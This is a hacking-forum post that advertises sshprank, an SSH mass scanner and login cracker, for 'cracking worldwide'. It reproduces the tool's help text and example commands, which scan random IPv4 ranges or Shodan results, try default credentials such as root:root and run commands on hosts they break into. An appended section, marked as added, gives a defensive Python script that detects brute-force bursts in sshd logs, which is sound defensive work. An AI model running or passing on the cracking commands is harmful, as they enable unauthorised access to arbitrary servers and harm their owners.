Fast SSH Mass-Scanner 05-05-2020, 09:49 PM
#1
For those who have been waiting a long time for mass or bot SSH cracking worldwide, enjoy ;D Very HQ tool for me <3
A fast SSH mass-scanner, login cracker and banner grabber tool using the python-masscan and shodan module.
https://github.com/noptrix/sshprank
[ hacker@BlackArch ~ ]$ sshprank -H
__ __
__________/ /_ ____ _________ _____ / /__
/ ___/ ___/ __ \/ __ \/ ___/ __ `/ __ \/ //_/
(__ |__ ) / / / /_/ / / / /_/ / / / / ,<
/____/____/_/ /_/ .___/_/ \__,_/_/ /_/_/|_|
/_/
--== [ by nullsecurity.net ] ==--
usage
sshprank [opts] |
modes
-h - single host to crack. multiple ports can be seperated
by comma, e.g.: 22,2022,22222 (default port: 22)
-l - list of hosts to crack. format: [:ports]. multiple
ports can be seperated by comma (default port: 22)
-m [-r ] - pass arbitrary masscan opts, portscan given hosts and
crack for logins. found sshd services will be saved to
'sshds.txt' in supported format for '-l' option and
even for '-b'. use '-r' for generating random ipv4
addresses rather than scanning given hosts. these
options are always on: '-sS -oX - --open'.
NOTE: if you intent to use the '--banner' option then
you need to specify '--source-ip' which
is needed by masscan. better check masscan options!
-s - search ssh servers using shodan and crack logins.
see examples below. note: you need a better API key
than this one i offer in order to search more than 100
(= 1 page) ssh servers. so if you use this one use
'1' for 'page'. don't bother me with this, bitch
-b - list of hosts to grab sshd banner from
format:[:ports]. multiple ports can be
seperated by comma (default port: 22)
options
-r - generate random ipv4 addresses, check for open
sshd port and crack for login (only with -m option!)
-c - execute this on host if login was cracked
-u - single username (default: root)
-U - list of usernames
-p - single password (default: root)
-P - list of passwords
-C - list of user:pass combination
-x - num threads for parallel host crack (default: 20)
-S - num threads for parallel service crack (default: 20)
-X - num threads for parallel login crack (default: 20)
-B - num threads for parallel banner grabbing (default: 70)
-T - num sec for connect timeout (default: 2s)
-R - num sec for (banner) read timeout (default: 2s)
-o - write found logins to file. format:
::: (default: owned.txt)
-e - exit after first login was found. continue with other
hosts instead (default: off)
-v - verbose mode. show found logins, sshds, etc.
(default: off)
misc
-H - print help
-V - print version information
examples
# crack targets from a given list with user admin, pw-list and 20 host-threads
$ ./sshprank -l sshds.txt -u admin -P /tmp/passlist.txt -x 20
# first scan then crack from founds ssh services
$ sudo ./sshprank -m '-p22,2022 --rate 5000 --source-ip 192.168.13.37 \
--range 192.168.13.1/24'
# generate 1k random ipv4 addresses, then port-scan (tcp/22 here) with 1k p/s
# and crack login 'root:root' on found sshds
$ sudo ./sshprank -m '-p22 --rate=1000' -r 1000 -v
# search 50 ssh servers via shodan and crack logins using 'root:root' against
# found sshds
$ sudo ./sshprank -s 'SSH:1:50'
# grab banners and output to file with format supported for '-l' option
$ ./sshprank -b hosts.txt > sshds2.txt
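For defenders: the help text above defaults to `root:root` with 20 parallel login threads and 2-second timeouts, so a run shows up in sshd logs as a tight burst of failed passwords from one source. The following is an added example, not part of the original post or the sshprank project. It flags such bursts and any accepted login that follows one; the log lines are constructed, the log format is assumed to be OpenSSH syslog, and `threshold` and `window` are illustrative values.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd syslog lines (RFC 5737 documentation addresses), not from the post.
SAMPLE_LOG = """\
May  5 21:49:01 gw sshd[1001]: Failed password for root from 203.0.113.7 port 40001 ssh2
May  5 21:49:01 gw sshd[1002]: Failed password for root from 203.0.113.7 port 40002 ssh2
May  5 21:49:02 gw sshd[1003]: Failed password for invalid user admin from 203.0.113.7 port 40003 ssh2
May  5 21:49:02 gw sshd[1004]: Failed password for root from 203.0.113.7 port 40004 ssh2
May  5 21:49:03 gw sshd[1005]: Failed password for root from 203.0.113.7 port 40005 ssh2
May  5 21:49:03 gw sshd[1006]: Failed password for alice from 198.51.100.20 port 51000 ssh2
May  5 21:49:04 gw sshd[1007]: Accepted password for root from 203.0.113.7 port 40006 ssh2
May  5 21:49:09 gw sshd[1008]: Accepted password for alice from 198.51.100.20 port 51001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

def parse(log, year=2020):
    """Yield (timestamp, source_ip, user, accepted) for password auth events."""
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:  # syslog omits the year, so the caller supplies it
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["ip"], m["user"], m["result"] == "Accepted"

def detect(log, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with >= threshold failed passwords inside a sliding window,
    and record accounts that later authenticate from a flagged source."""
    recent = defaultdict(list)  # ip -> failure timestamps still inside the window
    users = defaultdict(set)    # ip -> every username the source has tried
    alerts = {}
    for ts, ip, user, accepted in sorted(parse(log)):
        if accepted:
            if ip in alerts:  # success after a burst: treat as a guessed password
                alerts[ip]["compromised"].append(user)
            continue
        users[ip].add(user)
        recent[ip] = [t for t in recent[ip] if ts - t <= window] + [ts]
        if len(recent[ip]) >= threshold:
            alerts.setdefault(ip, {"peak_failures": 0, "users": users[ip], "compromised": []})
        if ip in alerts:
            alerts[ip]["peak_failures"] = max(alerts[ip]["peak_failures"], len(recent[ip]))
    return alerts

if __name__ == "__main__":
    for ip, info in detect(SAMPLE_LOG).items():
        print(ip, info)
```

A single mistyped password followed by a success, as with `alice` in the sample, stays below the threshold and is not reported.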